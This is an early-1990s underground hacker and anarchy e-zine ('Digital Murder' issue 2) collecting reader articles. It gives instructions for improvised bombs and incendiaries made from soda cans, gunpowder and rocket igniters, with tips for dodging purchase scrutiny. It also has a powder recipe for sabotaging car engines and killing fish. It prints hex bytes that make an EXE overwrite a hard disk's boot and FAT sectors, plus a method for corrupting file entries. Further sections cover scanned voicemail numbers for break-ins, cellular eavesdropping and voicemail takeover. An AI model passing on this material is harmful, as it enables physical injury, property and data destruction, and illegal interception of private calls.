2 /// / /// / ///// // / // // // // /// /// //// /// / / / /__ / / / / / /// /// // // / / / / / / / / / / / / / / //// / // // // // // /// / / /'' /// /// / //// / / / / ///// // // ///// // \ /// ///// // \ A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes Issue No. 02 November '91 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- These filez are for educational and informational studies only. The writers for Digital Murder will not be responsible for any use or misuse of information published in this disk-based magazine. The magazine and its contents are free to the public and may be freely distributed in any form as long as Digital Murder magazine and the author is given credit. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Information is Power. E d i t o r ' s N o t e z -=-=-=-=-=-=-=-=-=-=-=-=-=-=- Here it is! Issue #2 of Digital Murder released, slightly late, November 25th, 1991. It'z been hell getting everyone motivated enough to continue a monthly 'zine but, as you can see, it was done. We got a lot of positive responses from readers and have heard that issue #1 hit 35 or so boards in the United Socialist Republic of America and a few boards overseas (Sweden, Switzerland, and Holland). Thanks goes out to those few that I asked to spread the magazine and an even larger group that spread it without me asking. . . you know who you are. Since the idea of using a P.O. Box flopped due to no one sending us mail to it, we have closed it. If you were thinking about sending us a letter, sorry. We have plans on getting an internet address as soon as I decide where to get it. As well as the internet address, we plan to start a usenet newsgroup. We will put a complete list of addresses to reach us at in issue #3 which will be out December 15th. So until issue #3 comes out, call The Backdoor at 901.386.6455 to leave comments, submit articles, pick up the current or previous issue, etc. - M o r p h e u s / Editor. --------------------------------------------------------------- D i g i t a l M u r d e r - - - Backdoor (901)/386.6455 --------A---D-a-n-g-e-r---K-u-l-t---P-r-o-d-u-c-t-i-o-n-------- pg#. I N T H I S I S S U E ---- --------------------------- 3 Anachy For Sale---Neuron God & Mystic Blade's guide to destruction. 6 Virus in My Soup!---Digital Terrorist brings you more virus phun. 8 Virtual Networks---General/Technical file on a few fone networks. @5+$QYMonth---Zapped brings another great scan for your enjoyment. 12 Cellular Freqing---Eavesdropping on Cellular calls with modified scanners. 14 Action Systems Fone Network Info by Technysis 16 Heaven's Trash---Final words from Morpheus. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 3 - = A N A R C H Y F O R S A L E = - By: Neuron God/INFOword/Danger Kult Sticky Coolwhip --------------- This first project involves three substances; Vinegar, Milk (whole), and Cool Whip. Heat the milk in a pot until it comes to a VERY low boil. Add vinegar until it separates. The solids are CASEIN. Heard of it before?? heheh.. yeah, that's the shit they used to use for superglue. Now, all you have to do is make a good amount of this and mix it with Cool Whip. You'll have a fluffy white mixture which puffs up very nicely and is sticky as hell. Possible uses: Cake topping. Fucks up dentures (and regular teeth) Cover for keyhole on car.. (guess) Car design solvent. Munches the paint right off. Try freezing it. If you've whipped it up enough, it should be fairly liquified and will run easily. Freezing it will give you a substance similar to a Jell-O pudding shit. Try adding food coloring and putting it on a stick.. will taste like milk that's slightly older than God. Phun With Coke Cans ------------------- Hell, you could use any kind of can for these as long as ya drain it, wash it, and let it dry WELL. For this first project, you'll need to cut the bottom off of one of the cans. Really old scissors that are still fairly sharp (and which won't be missed by, say, the local store) are good for cutting cans since they cut straight and quickly. Cut the bottom off with about 1 inch of thin metal left to make a cup-looking thing. Take the scissors and at about 1 quarter inch margins (one centimeter for the Euros, I know it's not equivalent, but it doesn't matter), cut down the sides about another quarter inch. Bend the flaps down to keep from getting cut while you work with this thing. If you have soldering experience, solder the flaps to the inside of the can just to make sure (this also makes it easier to use in other projects). 4 You can make a lot of these now if you want because they will be the most-used part of the cans. Don't throw away the top part yet because the sheetmetal-type aluminum can be used to make some AWESOME 'noisemakers'!! Now that you have a few of these prepared, obtain some black gunpowder. This is sold at some weapons shops (especially those which specialize in Black-Powder or antique-interest weapons, or which carry shell packing materials for the rabid hunter who likes to repack shells). You should be able to get this without any permits but if you buy it in excess, questions will be asked. To be safe, either buy packing materials (which can also be useful if you're the creative type) or buy from different stores around the area, rotating your supplier every week. We can now begin on our first 'device'. In model rocketry hobby section of your local hobby store there are specially made engines and ignitors for these engines. They can be used for our purposes seperately or together, so get a few of them. The ignitors are electricity-based flamers and You will need some source of electricity (about 2-3 AA batteries should do the trick) and some LONG wires to connect the flamer to the source. Some Scotch tape (or any clear, light weight tape) is needed to hold the flamers in place. In this project, you need to cut out some of the scrap-metal from the long upper part of the cans. One can should provide at least enough for two of these devices. Cut just enough of the sheet metal out to totally encircle a medium- powered rocket engine (I like the A8-3 single stagers myself). The engine should be large enough to carry the weight of the metal. When you have the metal cut to the proper size, move the engine FAR away and solder the metal into a cone. Cut a small circle of metal just big enough to cover one end of the cylinder and solder it in place. Let this cool OVERNIGHT just to be safe. The engine should now slide into and out of the container easily. Depending on what type of thing you want to make, follow the remaining instructions: 1: Bomb-- To make a bomb out of this, cut another circle out of the metal as though you were going to plug the second end up as well. Cut one side of this circle just enough so that the igniter and wires can still fit correctly to the engine. Plug the empty space with something which is light but flammable, such as toilet paper or paper towels but not too tight. If you're too nervous to solder the second cover on, use something like superglue or epoxy. 2: Rocket/bomb-- The same as above, except that you can pack some explosive substance at the closed end of the container, then some toilet tissue or Kleenex (not very much on this one though), then the engine. The engine must be superglued in just at the bottom of the tube where the rocket end is exposed so lift can be achieved. 5 It is advised that you put controlling surfaces on your rocket so it will be a little more predictable. Use light tape on the flamer so it will easily release when the rocket lifts off. I strongly recomend using some sort of launch guidance system, such as a part of a drinking straw glued to the outside of the rocket and then set onto a metal dowell that will keep it flying straight until it's at a safe height. When the rocket reaches its top flight, it will send out a small explosion at the top which will ignite whatever you pack up there. The rocket works best with custom-designed rockets from your hobby store, with some slight modifications, such as an addition of the explosive instead of a parachute or streamer. The rockets may take a few seconds/minutes to ignite, since some flamers aren't as good as others. If you make a heavy rocket, use as big an engine as it needs (you'll learn by experiment). Cans can also be used to make great alcohol lamps, ovens, or bombs. Get a flamer from the previous projects, some dena- tured alcohol (6xx proof!!! don't drink it!!) and some can bottoms. Drill a hole in one can bottom big enough to work with, but not so big as to be unpluggable. Solder this one to an unmodified can bottom to make a container with two bottoms. The hole should be in the center of the bottom of one of the cans. Pour the alchohol into the container slowly through the drilled hole until it is about 3/4 full. Put a flamer in the hole so that it just barely touches the alcohol. Tape this sucker up good and superglue it if possible. The flamer should ignite the alcohol which has just enough air to burn good, and the cans will either implode or explode depending on whether the alcohol cathes fire good or not. It may just use up some of the oxygen and create a partial vaccum, or it may explode and spread burning alcohol quite a distance. A full can of a carbonated drink can be fun, too. Shake it up, roll it around, throw it up in the air (if you throw it really high, catch it. If not, let it hit the ground). Try putting it over a LOW flame on a grill. When it starts to bulge, remove it. After doing any/all of these things, take it to a tall building with a stairway. If it is like most stairways, there will be some space in the center where this can be dropped. With the combination of the pressure inside the can and the force of it falling, the impact will be quite messy (and if not found for a few days, sticky, smelly and hazardous to the new paint job too... heheh..) It is hell to clean up.. just try to get the can to add that extra touch to the question "What the Hell happened here?" They won't even know where to begin asking questions... 6 All of these ideas can be expanded upon, modified, or just plain used in unusual ways. Remember, always be creative with your methods of destruction... NG '91 -- InFOWOrd/ DK. Awful Magic Powder - by: Mystic Blade! ------------------ Needed ------ * 6 or 7 cans of Arid Extra Dry spray. * 1 closet size mirror * Note * You can scale this done to just a bathroom mirror or any flat smooth surface. Spray the surface of the mirror until completey solid white. Let it set and dry for the next 24 hrs. then scrape of the residue. Do this until all the Arid is gone. You now have what's known as Great awful magic powder. One ounce of this powder per automobile gas tank will screw up an engine. A single teaspoon will kill off a 10 gallon fish tank and all the fish. Till fun is fun....Im outta here! *Mystic Blade* /\/\/\/\/\/\/\/\/\/\ An Algebra of Evil \/\/\/\/\/\/\/\/\/\/ More Virus Info from Digital Terrorist! More Hard Drive Phun! -=-=-=-=-=-=-=-=-=-=- Hey, you anarchists trying to learn something, This is for you! I just thought you might find it interesting... Do you know that you can destroy a hard disk by writing 18 bytes to the end of an EXE file (you can do it with 14 but I'll just do this for the sake of simplicity). Ok, to use this look for the last occurence of CD 21 (or m! in ascii) with some type of hex/ascii editing program. Once you have found it, insert these hex codes after that last CD 21. Be careful... Don't run this program after you have "fixed" it unless you want to re- format your HD. Here goes... 7 (insert these bytes of hex code in after the final m! [CD 21]. Notice that the m is ascii 205 not an equal sign (=).) B4 03 B0 C8 B5 00 B1 01 B6 00 B2 02 (the 02 stands for the C drive. You can specify 00 for A drive, or 01 for B drive, etc... This is the drive that you want to destroy.) CD 13 B4 4C CD 21 Well, that's pretty much it. Viruses are made in a way such as that the virus takes code such as this and manually inserts it into an EXE or COM file along with the code that it has for self replication. Also, notice that this code is made to write over the boot, FAT, and root directory sectors with just any ole' address out of memory... ( whatever is in the DS and DX registers at the time ). Note that you can also insert your code BEFORE the last CD 21 by inserting it two bytes before the last CD 21 (those two bytes in fact should be B4 4C). Once you do that, you can cut this code down to 14 bytes by eliminating the final four bytes (B4 4C CD 21). File Phun -=-=-=-=- Scanning files in directories, and changing the entry of the "starting cluster" and the file size. By changing, I mean swapping with other files so, therefore, if you once had an EXE file called READTHG.EXE and some other files, you would mysteriously find that READTHG.EXE contained another EXE, a data file, or a text file. How do you do it? No problemo... First you ascertain info from the boot sector on where the FAT and root directory sector are located which will be explained later. Then you pick out the root directory sector. Filename entries in a directory sector are stored as such: [ Filename- 11 bytes no period!] [Attribute- 1 byte] XX XX XX XX XX XX XX XX XX XX XX XX [Reserved by MS-DOS- 10 bytes] [Time/Date stamp- 4 bytes] XX XX XX XX XX XX XX XX XX XX [Time] [Date] XX XX XX XX [Starting Cluster- 2 bytes] [File Size- 4 bytes] XX XX XX XX XX XX Notice that the XX's are hexadecimal numbers. 8 1. Filename is padded with spaces between the first eight and the last 2. ie HELLO DOC... It MUST be padded with spaces if it is to be used. 2. Attribute: Read Only- hex 01 Hidden- hex 02 Archive- hex 20 Subdirectory- hex 10 Volume Label- hex 08 System- hex 04 When these attributes are combined (say read only and hidden), they produce hex 03, or the sum of their numbers. 3. Time/Date stamp will almost ALWAYS be irrelevant to a good anarchist. 4. Starting Cluster- this is the cluster where the file starts. DOS reads the FAT chain and determines where ALL of that file is but if this and file size are swapped with other files, pandemonium will break lose. 5. File Size- this is represented by a 4 byte binary number, the rightmost digit being most signifigant. Well, that should pretty much give you plenty of information to do that nice little thing, or plenty of other things. Virtual Telephone Networks General/Technical Outline Written and compiled by Morpheus. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This technical journal on Telephone Networks has been compiled to introduce the basics of them to newer phreakers yet does contain a lot of information that will interest the more advanced reader. History of Virtual Networks =-=-=-=-=-=-=-=-=-=-=-=-=-= To be honest, virtual networks are nothing new since many LDS companies, such as AT&T, MCI, and Sprint, have been offering them since 1985. ISACOMM (now US Sprint) was the first to introduce a virtual network service, using Satellite Business Systems (SBS) satellites as early as '84. SBS acted as the carrier while ISACOMM was responsible for promoting and managing the service. 9 SBS introduced it's own network in early '85 and was later bought by MCI. Also in 1985, US Telecom redifined ISACOMM as VPN (Virtual Private Network) which is now the base for Sprint. Later on, AT&T introduced its Software Defined Network (SDN) product. AT&T's SDN =-=-=-=-=-= When a user picks up his phone at an on-net, dedicated SDN site and dials a number, the dialed digits are sent to the serving AT&T SDN office through the local network. This SDN office receives the dialed digits, and notes the originating number via ANI (Automatic Number Identification). This info is passed to the ACP (Action Control Point), which will then check the NCP network database for routing and translation information based on the ANI of the user. After the check is complete, the NCP returns appropriate routing information to the ACP, which encodes a billing record and send the call through the network. AT&T has marketed many special features with SDN. For example, when the NCP receives the call information from the originater of the call, it can screen the call according to a set of valid originating numbers to see if the call is even allowed to be sent through the network. It can also be setup to request an authorization code to validate calling privs. It can prompt certain screened calls with preprogrammed ann- ouncements to provide options for routing. Off-net calls follow a similar procedure in which the user of the SDN dials an off-net access number (800- or 950-) or can access the network through switched equal access. In this case, the dialed digits and any code entered are screened and sent to the ACP, and then gets instructions from the NCP. Whenever announcements are required, they are sent from the Network Services Complex (NSC). Thus, if the network were to ask for an authorization code, the message would be sent from the NSC. Map of SDN: ---------- Features SDNCC -------- SMS --\-- !! -\- \ +----------!!--------------+ \ >-->!-->-->->+-!!--+ A L! \ ! ! NCP ! T D! >-->-->-->-->-->-->->! --- ! NSC & N! ! /-----\ / T ! ! / \ / ! ! ACP ACP ! +-----/----------\---------+ / \ SDN Dialup SDN Dialup 10 MCI's VNET =-=-=-=-=-= This network uses three types of switches: 1) Northern Tele- com DMS-250, 2) DEX 400, and 3) DEX 600 by Digital Switch Co. MCI uses SS7 (signal system 7) on all of their intermachine trunks. When a user picks up the phone and calls the dialup, it is connected into the MCI Vnet network similarly to SDN by AT&T. The routing of a Vnet call starts with a request from a digital switch to the Network Control System (NCS) for route information. This request travels through one of the Data Access Points and then the NCS checks the customer's database for routing information, call privileges, etc. and sends that information back to the switch, again through the DAP. After all this, the call is sent through. Map of Vnet: ----------- Dial '1' or Vnet Card Access Calling thru Dialup ------------!!!------------- --------!!!-------- !!! !!! (Telco C.O. switches call) (Telco CO doesn't switch call) !!! !!! +--------------------+ +--------------------+ /<-- MCI Network Access !-----------! MCI Network Access -->\ ! +--------------------+ +--------------------+ ! ! !!! !!! ! ! !!! !!! ! \ MCI Switch MCI Switch / \ +----------------+ / >-->-->-->-( DAP )-! N.C.S. !-( DAP )-<--<--<--< +----------------+ US Sprint's VPN =-=-=-=-=-=-=-= US Sprint uses 100% fiber optic networking and uses powerful Northern Telecom DMS-250 switches linked by SS7, with DMS300 switches as international gateways. When a US Sprint VPN user picks up the phone, dials a local VPN system, and calls through it, the call is forwarded to a serving point. That switch, through its Message Switch & Buffer (MSB) signaling point, sends a routing request to the nearest Signal Transfer Point (STP). The STP passes the re- quest to the Database Control Point (DCP) for processing. After checking the customer's database account, the info is sent back to the MSB. The call is then sent through. 11 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Digital Murder Scan 'o' de Month! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Zapped here with another scan for all of you phone junkies out there. This scan, as you will see below, is of the 233 prefix. If you missed last month's article, it was on the 336 prefix. Get in touch with us. . . we have all back issues on file. Prefix owned by: AT&T Voice Mail Systems ------------------ 1-800-233-0010 After Business Hrs VMB 1-800-233-0065 Methodist Hospital--listen or hit 0. 1-800-233-0214 Knoll Sue's VMB--listen for menu. 1-800-233-0316 * + 4 digit boxes. 1-800-233-0407 First Trust--- 1-800-233-0567 Corum 'Hell'--* or #. 1-800-233-0618 experiment with--uses 'numeric messages' 1-800-233-0713 Datanational-- * 1-800-233-0995 Griffen Services-- # 3 digit boxes 1-800-233-1000 Audix VMB 1-800-233-1106 * -- 3 digit boxes 1-800-233-1304 Aetna - */# 4dig.boxes 1-800-233-1717 4dig.boxes 1-800-233-1808 3dig.boxes 1-800-233-1903 Beacon's NW--*/# (fairly easy) 1-800-233-2025 (currently using an old VMB sys.) 1-800-233-2119 Spectrum */# 3digboxes(excld.1,2) 1-800-233-2250 Credit and Leasing Corp. 1-800-233-2331 Billing Dept of DTOM 1-800-233-2400 Am. Murex Corp. 1-800-233-2450 Armstrong---Dictation Service...interesting 1-800-233-2520 Interesting System... 1-800-233-2617 uses Audix--listen or hit *7 1-800-233-2875 */# 3digs.boxes 1-800-233-3029 Penox Tech.--*/# 1-800-233-3200 0+1 for VMB 1-800-233-3314 ? 1-800-233-3411 0+1 for VMB 1-800-233-4007 ? 1-800-233-4606 Bank of San Fran--haven't messed w/it 1-800-233-4800 #+* ...3dig boxes 1-800-233-5969 *+ext/# for VMB 1-800-233-6269 */# 1-800-233-6300 *+x (x=dig 0-9) 1-800-233-6789 */# 1-800-233-9069 alwayz busy...couldn't verify 1-800-233-9175 same as 9069 1-800-233-9325 same as 9069 1-800-233-9477 listen for menu 1-800-233-9575 same as 9069 1-800-233-9650 same as 9069 12 Carriers -------- 1-800-233-0037 (expected hello,:job,:data,or(cmd),as logon.(cierr 1402) 1-800-233-0692 (<>) 1-800-233-0887 1-800-233-1217 (wierd pulse then carrier and kicks off line) 1-800-233-2921 (???) 1-800-233-4224 (performance 200 emulex) 1-800-233-4700 (towers perrin online -- phila --press enter) 1-800-233-5315 (gives > prompt) PBXs/etc -------- 1-800-233-1925 1-800-233-3750 Fax's & Misc. ------------- 1-800-233-0180 1-800-233-0904 1-800-233-1210 1-800-233-2180 1-800-233-2850 1-800-233-3504 1-800-233-4479 1-800-233-5169 1-800-233-5170 1-800-233-6150 Thats it for this month so be watching next time for more and hopefully more interesting numbers to play around with so until then Ive been. . . . Zapped! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Scanning for Phun and Information. By: Chizz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Scanners are wonderful toys. They allow us to listen to info that otherwise would be impossible to hear. Everyone has heard of using scanners to listen in on police and fire, but that gets old after a while. One can only hear so much of police calling in stating that they are going on a doughnut break. Now there is a use for a scanner that is much more interesting, not to mention fun: listening in on cordless phones and cellular phones. One day, blackened buffered a post off of a board that listed the 10 cellular frequencies. There are 10 for the base and 10 for the handset. The base frequencies are the most powerful, there- fore these are the ones that should be put into the scanner. I did not except much while i reluctantly inputed the frequencies but after I fired up and started scanning, I could not believe my ears. 13 Picking up my neighbors is really quite interesting. I have heard everything from a woman's daughter being pregnant to a couple owing 10,000 dollars in back taxes, and their unhappiness. It is so easy to pick up these cordless phones that it is funny. Cordless phones can be picked up by any programmable scanner such as the $139.00 Radio-Shack pro-38, 10 channel programmable. Below is a list of the cordless phone frequencies: Channel Base Handset 1 46.610 49.670 2 46.630 49.845 3 46.670 49.860 4 46.710 49.770 5 46.730 49.875 6 46.770 49.830 7 46.830 49.890 8 46.870 49.930 9 46.930 49.990 10 46.970 46.970 Now onto the more interesting and lively world of cellular phones. You must have a scanner that is 800 megahertz capable. My personal choice is a realistic pro-34. This is a hand-held model that has 200 channels, built in backlit lcd, and 10 channel temporary storage, for an effective capacity of 210 channels. This scanner runs for about $300 bux but I bought mine at a pawn shop for $120. The true cellular band is from 869.0000 mhz to 894.000 mhz. For some reason the powers that be convinetly omit the cellular band, instead, stopping at 868.9375 and resuming at 896.1125 on the pro-34. If you are happy listening to "mobile" phones, more appropriately known as two way radios, that operate in the 800 mhz band then a "stock" scanner is fine but if you are like me, that's just not enough. I was looking through a copy of radio-electronics one day and noticed that there was a scanner BBS. I called this bbs and downloaded a text file that contained the steps to modify a pro-34 for true cellular capabilities. There is not room here to go into how to modify the scanner but call the Red Onion BBS at (914) 342-4585 to get the file for this scanner or any other scanner (they have files for all popular scanners). After making the modifications, you can start the search scan at 869.0000 to 894.0000. If you live a large city, the cellular band is active at all times. I have listened to calls with subjects such as drug deals, prostitution, people growing their own dope, and a lady talking about using dildos. One particully funny moment was when this one guy got into a fight with his girlfriend, went out and got drunk, and on his way home he called up his girlfriend crying and moaning and then he got pulled over for drunk driving. It is also a 14 good way to get information if you have a DTMF decoder. A lot of people that have cellular phones also have VMB's. You can listen in as they call their system and if you are familiar with the system that they are on, you can call up and take over their box. If you think that this would be an interesting thing to do then be sure to do it soon because in the next ten years or so all cellular services will be switched from analog to digital making it impossible for a conventional scanner to be able to decode the conversations. If you have any questions, or information that you have found useful then please leave me mail on Digital murder's WHQ, The Backdoor BBS at (901)/386-6455. -------------------------------- Disection of the ACTION Roadrunner Telephone Management system -------------------------------- By:Technysis This series of artices to follow has taken much time and extensive coverage. I see these articles as truly original material, as I went through personal connections to get the information contained here. The following information was taken from various technical sources and other misc. information from a rural area here in my state. I live in Memphis, which is under ESS, however, where I was at, they were under some other older system. The Action Roadrunner Telephone Management System is a computer controlled routing, tandem switching system. As such, the system functions in support of an existing PBX type system and may be configured for network operations between properly equipped locations. Through these of the network capabilities, a business can impliment a private network to reduce overall call costs and record network/system traffic statistics. Network operations are provided by extending the local serial bus of the Master node to control the operation of satellite nodes and collect call record data from Remote intelligent nodes. Unintelligent (noncomputerized) satellite nodes are controlled exclusively by the intelligent node to which they are connected by data link and tie lines. The Intelligent Remote nodes direct their own call processing functions and those of their associated Satellite nodes. In this configuration, the Master node serves as a centralized record collection point while providing a centralized database update point. The support equipment expalined serves to expand the interfacing capabilities of the system by accommodating ground start-type trunk circuits and collected key-type systems. Other equipment, when optionally selected by the CO, is designed to provide remote access from rotary tele- phone by the Voice Terminal Device. 15 VCA Subsystem ------------- A Pulsecom Voice Connecting Arrangement (VCA) subsystem is used instead of Telco-supplied CDH-type VCAs. Each circuit card interfaces one system port to one Telco trunk circuit (DDD, WATS, or FX). These cards are housed in 10 card cages which are assembled into a wall mounted rack assembly containing eight card cages for a total of 72 VCAs on a freestanding rack assembly containing 16 card cages for a total of 144 VCAs. Amplifier Subsystem ------------------- Trunk amplification is used to adjust and stabilize trunk levels appearing at the system while being OFF when the circuit is not in use. The single-channel circuit cards (repeaters) housed in 11-slot card cages are assembled into a wall mounted rack assembly which can contain up to six card cages for a total of 66 amplifiers per rack. Each rack requires a dedicated 120 Vac 15 amp circuit to power the -48 Vdc power supply which supplies the required power to the card cages. Two amplifier circuit card types are available for voice only or voice/data circuits. A voice-only circuit uses the UM-100 Amplifier Card and a voice/data circuit uses a VFR-1050 Amplifier card. Both card types share the same card cage. One 25-pair cable is used per card cage. Each circuit consists of two-cable pairs for a total of 22 pairs within each cable. The first cable pair is connected to each of the Telco side of the demark and the second pair to the ACTION side. The UM-100 Amplifier Card is equipped with a UM-3502 Plug-on Option card which is used to program the amplifiers oper- ation. Two adjustment options are also available with the 3502 card. The VFR-1050 Amplifier card is supplied with progammable options as well. This card is used when data transmissions are anticipated on the connected trunk circuit. The VFR-1050 Amplifier Card options given consist of amplifier gain adjustment, equilization adjustment, sensitivity slope adjustment, and a disable on/off switch. Keyset Adapter Subsystem ------------------------ The Keyset Adapter subsystem is employed to permit telephone circuits that are not associated with a PBX type system to be interfaced to the system. Key systems or dedicated single-line instruments may access the system by this subsystem. The Keyset Adapter Subsystem may be configured in a free standing rack (128 circuits max.) or on a wall mounted unit (48 circuits max.) The two circuit cards that 16 make up the Keyset Adapter Circuit are the E&M-to-Loop Converter Card and the Dual Line Coil Card. The Dual Line Coil Card accommodates two E&M-to-Loop cards. The cards are clustered in groups of three with the Dual Line Coil Card in the center to provide two circuits. Three clusters of three cards each supply six circuits per card cage in the wall mount unit and four clusters yielding eight circuits per card cage in the free standing rack. Voice Terminal Device --------------------- The Voice Terminal Device (VTD) is a word recognition sub- system configured into a single cabinet. The VTD is composed of a cental processor, a vector processor, memories, and I/O devices for eight system ports. The System port cards are configured for 2-wire operation with 0db pads and serve as the bidirectional VTD interface. The System port cards used for the VTD are located in consecutive card cage slots within a single card cage. The first card is a Voice Terminal Serial Interface Card and the next seven cards are Audio Interface Cards. The Voice Terminal Serial Interface card accepts the binary output of the VTD for the eight serial ports. Theu|Y| decoded output of each of the right ports is sent to the Voice Terminal Serial Interface card in the first port. ---------------------------------- Hope that was at least a little bit interesting. That was nowhere near the complexity of explainng ESS. However, the little trip to the past could prove useful because many sys- tems such as these are still in use. I will have future articles on the Action system but for now I can't type anymore... Hehehe.. Later all and don't forget; Bell holds the ultimate in info- rmation and power from us but they will not be able to hold back the flood of hackers breaking away at their wall. Long live the cause. -/-\-/-\-/-\-/-\-/-\-/-\-/-\- H e a v e n ' s T r a s h -\-/-\-/-\-/-\-/-\-/-\-/-\-/- Strip away the blanket of secrecy! Here's a few books I've found that I encourage you to order and READ. The Brotherhood by Stephen Knight-- Take a look behind-the-scenes at the inner workings of the Masons, a tightly knit, all male society whose members hold some of the highest posts in business and government. . .and who are bound by an iron-clad oath of secrecy. --$8.95 17 Big Secrets by WIlliam Poundstone-- this book blows the lid off some of the world's best kept secrets. You'll learn how to beat a lie-detector test, get the low down on secret messages and subliminal advertising, and how U.S. currency is made. --$8.95 Make My Day by George Hayduke-- Don't get mad, get even! Make My Day covers every type of revenge from simple pranks to complex plots. You'll learn hundreds of devious, diabolical ideas for getting even. --$7.95 Those books can by ordered by calling 1-800-282-8086. ------------------------------------ The Anarchist Cookbook-----$21.95 The Poor Man's James Bond--$21.95 Shipping/Handling-----------$4.00 (602)/634-6280 Those can be purchased at named prices from: BUTOKUKAI P.O. Box 430 Dept. SG Cornville, AZ 86325 ------------------------------------ You can get the Anarchist Cookbook a little cheaper by ordering it from the publishers ($22.00 postpaid). Barricade Books Box 1401-F Secaucus, NJ 07096 ----------------------------------- If you are into punk, alternative, ''new-wave'', or whatever you wanna call it or are interested in reading some good 'zines with topics ranging from political corruption, anti- government action, and environmental news then check these phucking cool mags. Write 'em for price info if not listed. Flipside (punk rock/noise/industrial/etc..music) P.O. Box 363 Whittier, CA 90608 Little Free Press (government views/utopian societys/etc) Rt. 1 Box 102 Cushing, MN 56443 Maximum Rock & Roll (punk/hardcore/etc..music) P.O. Box 288 Berkeley, CA 94701 File 13 ($2.00 per issue last time i checked) P.O. Box 175 Concord, MA 01742 ---------------------------------------------------------- ---------------------------------------------------------- 18 Maybe some of these will keep your brain clear but not washed like most in this country. You know the ones. . . those that are insecure about their future. Those are the people we all remember back in High School; the guys and girls who were alwayz pushing themselves into the system- alwayz pushing themselves into the clubs and cliques- pushing their future through a sieve, draining out all their unique qualities till all that's left is another person totally conditioned to be a corporate slave. Think about this. Think about and question everything. Thanks for reading and supporting Digital Murder. Issue #3 will be out December 15th. FEEL FREE to help out! Don't let those fascist shits on Capital Hill fool you into thinking that you can't still voice your opinion or share information! Call The Backdoor, leave me, Morpheus, feedback. Send in an article or just drop in and say what's on your mind. The 'zine should be better now that it'z getting more support as well as the fact that I've moved to the most boring city in the whole phucking world. The most ''exciting'' thing to do around here is this building that is the home of a movie theater that shows old movies, a skating rink and bowling alley for pre-teen preppies, and an arcade featuring billybob and his cousins playing pool for car titles while I waste my money on one of the seven video games in the city's only arcade. At least the old city I lived in isn't too far away from here. So while you are walking around breathing in America's cold, toxic, city air or feasting on the carcass of a dead turkey for thanksgiving, think of your editor slaving over the keys to bring forth another edition of the one and only Digital Murder. Contributors: Morpheus, Technysis, Chizz, Zapped, NeuronGod, Mystic Blade, and Digital Terrorist. Support Boards: Backdoor (901)/386.6455 Wanna be a support board? Leave Morpheus feedback on Backdoor. \n UD#9: Digital Murder U/D [X-Modem/UnltdBlk] UD: Downloaded From P-80 International Information Systems 304-744-2253